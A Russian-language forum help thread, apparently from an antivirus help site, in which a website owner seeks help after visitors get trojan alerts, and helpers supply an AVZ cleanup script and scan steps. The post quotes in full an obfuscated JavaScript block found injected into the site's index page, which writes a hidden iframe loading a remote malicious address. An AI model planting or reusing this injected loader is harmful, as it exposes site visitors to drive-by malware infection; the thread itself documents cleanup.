Вирус с сайта

Здравствуйте,
в какой момент начались проблемы не могу сказать. Мне позвонили пользователи сайта, на который я выкладываю статьи, говорят, что при загрузке главной страницы выпадает всплывающее окно с сообщением о вирусе.
"Ухо (09:38:37 27/10/2008)
на riverzoo.ru на главную заходишь запускается адобовский док, раза по четыре за заходи:

26.10.2008 21:49:54 HTTP filter file [URL]http://www.qmems.com.my/technology/html/[/URL] JS/Kryptik.B trojan connection terminated - quarantined COREKILLAH\ReZonatoR Threat was detected upon access to web by the application: C:\Program Files\Opera\opera.exe.

Проверял несколько раз."

у меня компьютер не ругался, и ничего не видел. На вопрос хостерам что это и как с ним бороться прислали следующую ссылку:
"1Gb.ru (13:43:38 27/10/2008)
Здравствуйте, ознакомьтесь пожалуйста со статьей [URL]http://www.1gb[/URL] .ru/virus (уберите лишний пробел перед .ru)"

я поудаляла на трех компьютерах, с которыми я работала все записи паролей к фтп. начала искать на своем компьютере вирусы, не находил. в итоге с вчерашнего вечера обновленный нод (3) поймал в карантин ссылку [URL]http://newv2count.net/pictures1/ztool2[/URL] и постоянно меня об этом информирует.
еще отключается деспетчер задач. один раз включила (через редактор реестра), а он теперь опять говорит "Деспетчер задач отключен администратором".
в итоге на сайте в индексной странице нашли вконце код
<!-- o65 --><script type="text/javascript">function Decode(){var temp="",i,c=0,out=""; var str="60!105!102!114!97!109!101!32!115!114!99!61!39!104!116!116!112!58!47!47!119!119!119!46!113!109!101!109!115!46!99!111!109!46!109!121!47!116!101!99!104!110!111!108!111!103!121!47!104!116!109!108!47!39!32!119!105!100!116!104!61!39!49!39!32!104!101!105!103!104!116!61!39!49!39!32!115!116!121!108!101!61!39!118!105!115!105!98!105!108!105!116!121!58!32!104!105!100!100!101!110!59!39!62!60!47!105!102!114!97!109!101!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++; out=out+String.fromCharCode(temp);temp="";}document.write(out);}Decode();</script><!-- c65 -->
удалили, сейчас вроде окна там не всплывают.

Деспетчер задач выключился. CureIt! не находит ничего. Нод тоже только ту карантинную ссылку. На одном из компов слетел виндовс.
Что мне делать дальше, и с моими компьютерами и с сайтами, чьи фтп данные были раньше у меня в фаре сохранены?

прикрепляю файлы, которые написаны в вашей инструкции.


заранее спасибо.

[URL="http://virusinfo.info/showthread.php?t=7239"]AVZ, меню "Файл - Выполнить скрипт" -- Скопировать ниже написанный скрипт-- Нажать кнопку "Запустить".[/URL]

[CODE]begin
SearchRootkit(true, true);
SetAVZGuardStatus(True);
QuarantineFile('c:\windows\system32\dlds6.exe','');
TerminateProcessByName('c:\windows\system32\dlds6.exe');
QuarantineFile('c:\windows\system32\update32.exe','');
DeleteFile('c:\windows\system32\update32.exe');
DeleteFile('c:\windows\system32\dlds6.exe');
BC_ImportALL;
ExecuteSysClean;
BC_Activate;
RebootWindows(true);
end.[/CODE]

Пришлите карантин по правилам и повторите логи...

шлю что набрала.

карантин- Файл сохранён как 081029_065017_virus_49084df96e3bb.zip
я еще сначала закачала неполный карантин, до выполнения 2го скрипта, так что не считайте его (081029_071200_virus_49085310272d9.zip)

антивирусник (nod32 v3) теперь пишет, что
Maximum protection is not ensured. access to files, email and internet is not secured.
Antivirus protection is desabled. virus scaner instialization failed. most of eset nod32 modules will not function properly.

AVZ => Файл => Мастер поиска и устранения проблем. Категория проблемы - поставьте "Системные проблемы", степень опасности - "Все проблемы". Нажмите "Пуск". Всё найденное следует пометить и пофиксить. Данную операцию повторить для категории "Настройки и твики браузера".

Сделайте полную проверку CureIT и повторите логи...

сделала

В логах чисто...

Спасибо!

пока вроде ничего не вылазит и нормально работает. только антивирусный сканер как вчера стал disable так и не включается

Переустановите...